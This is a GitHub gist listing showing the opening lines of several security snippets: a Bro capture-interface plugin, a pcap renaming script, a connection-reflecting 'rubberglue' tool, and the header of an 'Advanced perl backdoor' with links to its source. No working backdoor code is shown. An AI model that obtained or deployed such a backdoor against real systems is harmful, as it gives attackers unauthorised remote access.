Skip to content

Instantly share code, notes, and snippets.

@unusedPhD
unusedPhD / InterfaceSetup.py
Last active August 29, 2015 14:27 — forked from JustinAzoff/InterfaceSetup.py
set monitor interface settings for packet capture
#
# A plugin to setup capture interfaces
# The plugin is off by default. To enable it, add "interfacesetup.enabled=1" to broctl.cfg.
#
import BroControl.plugin
class InterfaceSetupPlugin(BroControl.plugin.Plugin):
def __init__(self):
super(InterfaceSetupPlugin, self).__init__(apiversion=1)
@unusedPhD
unusedPhD / pcap-rename.py
Created June 9, 2015 11:25
Rename pcap files with timestamp of the first packet
#!/usr/bin/env python
# https://github.com/DidierStevens/DidierStevensSuite/blob/96381a23c091c342820410c60059602c6a5cbadb/pcap-rename.py
__description__ = 'Rename pcap files with timestamp of the first packet'
__author__ = 'Didier Stevens'
__version__ = '0.0.1'
__date__ = '2014/10/03'
"""
Source code put in public domain by Didier Stevens, no Copyright
@unusedPhD
unusedPhD / rubberglue.py
Last active June 7, 2022 01:35
waits for a connection, if machine connects, it will forward request back on same port
# source: https://bitbucket.org/Zaeyx/rubberglue
import socket,asyncore
import time
import random
import hashlib
import os
class core():
def __init__(self, logfile, syslog=False, cap=False):
@unusedPhD
unusedPhD / perlbackdoor.pl
Last active February 9, 2018 10:25
Advanced perl backdoor
#!/usr/bin/perl
#
# Advanced perl backdoor
#
# http://www.purificato.org
# https://github.com/bunk3r/perlbackdoor
#
use warnings;
use strict;
use IO::Socket;